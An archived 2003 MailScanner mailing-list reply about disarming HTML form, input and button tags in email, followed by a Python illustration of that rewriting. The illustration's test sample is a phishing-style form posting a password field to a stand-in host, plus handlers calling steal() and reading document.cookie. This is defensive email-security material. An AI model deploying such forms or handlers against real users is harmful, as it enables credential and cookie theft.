Allow ..... Tags = disarm

Julian Field mailscanner at ecs.soton.ac.uk
Wed Nov 5 15:34:39 GMT 2003


At 15:07 05/11/2003, you wrote:
> > -----Original Message-----
> > From: Julian Field [mailto:mailscanner at ECS.SOTON.AC.UK]
> > Sent: Wednesday, November 05, 2003 6:46 AM
> > To: MAILSCANNER at JISCMAIL.AC.UK
> > Subject: Allow ..... Tags = disarm
> >
> > Disarming Form Tags
> >
> > A "Form" tag is replaced with a "MailScannerFormxxxx" tag, where xxxx is an
> > essentially random number (it's actually the process id). As this is an
> > HTML tag not recognised by your email client (or web browser) it will just
> > be ignored completely, as it should be according to the HTML spec.
> > An "Input" tag is modified so its type is a "reset" button, and all
> > JavaScript "on..." methods are removed.
> > A "Button" tag is modified so its type is a "reset" button, and all
> > JavaScript "on..." methods are removed.
>
>What's the point of disarming input tags when form tags are taken out?  An
>input without a form does nothing.

Are you sure that is the case in every badly written browser? Agreed, the
normal form submission actions can't happen, but what happens if you put an
onClick event in a button that is not within a form? Can you guarantee
someone won't let you do that?

>Changing the type of buttons seems like a very bad idea to me - I can easily
>imagine a lot of confusion resulting and it doesn't seem like a useful
>change.

I needed to change them to be able to guarantee they won't do anything.
Feel free to change the code if you don't like it :-)


> > Notes
> >
> > The point of the xxxx number on the end of each tag name is to protect
> > against an attack in which a new XML object or stylesheet setting is used
> > to create a new tag called "MailScannerForm" which has the same actions as
> > a conventional "Form" tag.
>
>I would prefer that the changes to the HTML be reversible - this makes that
>more difficult.  Wouldn't it be just as useful to prepend
>"MailScanner_%orgname%_"?  Seems like that would be enough to defeat the
>attack.  And blocking both <script> tags and on* attributes means there's
>nothing left that can examine the DOM to figure out the %orgname% string
>dynamically.
>
>Although I like the ability to disarm Javascript on* attributes, I'd prefer
>they were just disarmed, not removed.  Makes debugging much easier.  Ditto
>for codebase attributes.
>
>And although it's great to have this implemented in MS at all (thanks!), I
>wish it were just a list of tags I could specify arbitrarily.  For example,
>a new config file variable, "Tags To Disarm" could be defined.  It could
>contain either a ruleset or a list of tags.  The tags in the list would get
>"disarmed" by prepending something like "MailScanner_%orgname%_" to them.

That's not a bad idea.
--
Julian Field
www.MailScanner.info
MailScanner thanks transtec Computers for their support

PGP footprint: EE81 D763 3DB0 0BFD E1DC  7222 11F6 5947 1415 B654
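
As an added illustration of the rewriting described in the quoted message (this is example code written for this archive page, not MailScanner's own Perl implementation), the following Python rewrites the three tag types the way the message describes: "Form" becomes "MailScannerFormxxxx" with the scanner's process id as xxxx, and "Input" and "Button" lose every "on..." attribute and get type="reset". The `suffix` parameter, the regex-based tag scanner and the sample HTML are assumptions made for this example so that it runs offline with a predictable result; the orgname-prefix variant proposed in the reply would only change the string the form tag is renamed to. A `leftover_handlers` check is included so you can confirm nothing executable survives, including an onClick on a button that sits outside any form, which is the case the reply asks about.

```python
import os
import re

# Tags that "Allow Form Tags = disarm" rewrites, matched case-insensitively.
# Caveat (assumption of this example): like most regex tokenisers it assumes
# no attribute value contains a literal '>'.
TAG_RE = re.compile(r'<(/?)\s*(form|input|button)\b([^>]*?)(/?)>',
                    re.IGNORECASE | re.DOTALL)
# name[=value] pairs inside a tag; values may be double-, single- or un-quoted.
ATTR_RE = re.compile(r'''([^\s=/>]+)(?:\s*=\s*("[^"]*"|'[^']*'|[^\s>]+))?''',
                     re.DOTALL)


def _attrs(s):
    """Return [(name, raw_value_or_None), ...] for the attribute text s."""
    return [(m.group(1), m.group(2)) for m in ATTR_RE.finditer(s)]


def disarm_html(html, suffix=None):
    """Disarm form/input/button tags as the quoted message describes."""
    if suffix is None:
        suffix = str(os.getpid())  # MailScanner appends its process id here

    def fix(m):
        closing, name, attrs, selfclose = (m.group(1), m.group(2).lower(),
                                           m.group(3), m.group(4))
        if name == "form":
            # Unknown tag name: a conforming client ignores it entirely.
            return f"<{closing}MailScannerForm{suffix}{attrs}{selfclose}>"
        if closing:
            return m.group(0)  # </input> or </button>: nothing to strip
        kept = []
        for key, val in _attrs(attrs):
            k = key.lower()
            if k.startswith("on") or k == "type":
                continue  # drop every JavaScript on* handler and the old type
            kept.append(key if val is None else f"{key}={val}")
        kept.append('type="reset"')  # a reset button cannot submit anything
        return f"<{name} {' '.join(kept)}{selfclose}>"

    return TAG_RE.sub(fix, html)


def leftover_handlers(html):
    """Names of on* attributes still present in any tag ([] once disarmed)."""
    found = []
    for tag in re.findall(r'<[^>]+>', html):
        for key, _ in _attrs(tag)[1:]:  # element [0] is the tag name itself
            if key.lower().startswith("on"):
                found.append(key.lower())
    return found


# Constructed sample message body: a credential-stealing form plus a button
# with an onClick that sits outside any form.
SAMPLE = ('<form action="http://example.invalid/steal" method="post">'
          '<input type="text" name="pw" onfocus="steal(this)">'
          '<input type="submit" value="Go">'
          '</form>'
          '<button onclick="alert(document.cookie)">Click me</button>')

# What the sample becomes with suffix "1234" in place of the real process id.
EXPECTED = ('<MailScannerForm1234 action="http://example.invalid/steal" method="post">'
            '<input name="pw" type="reset">'
            '<input value="Go" type="reset">'
            '</MailScannerForm1234>'
            '<button type="reset">Click me</button>')


if __name__ == "__main__":
    out = disarm_html(SAMPLE, suffix="1234")
    print(out)
    print("handlers before:", leftover_handlers(SAMPLE))
    print("handlers after: ", leftover_handlers(out))
```

Run stand-alone it prints the disarmed HTML and shows the two handlers (onfocus, onclick) present before and none after; with no `suffix` argument the rename uses the current process id, exactly as the message says MailScanner does.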


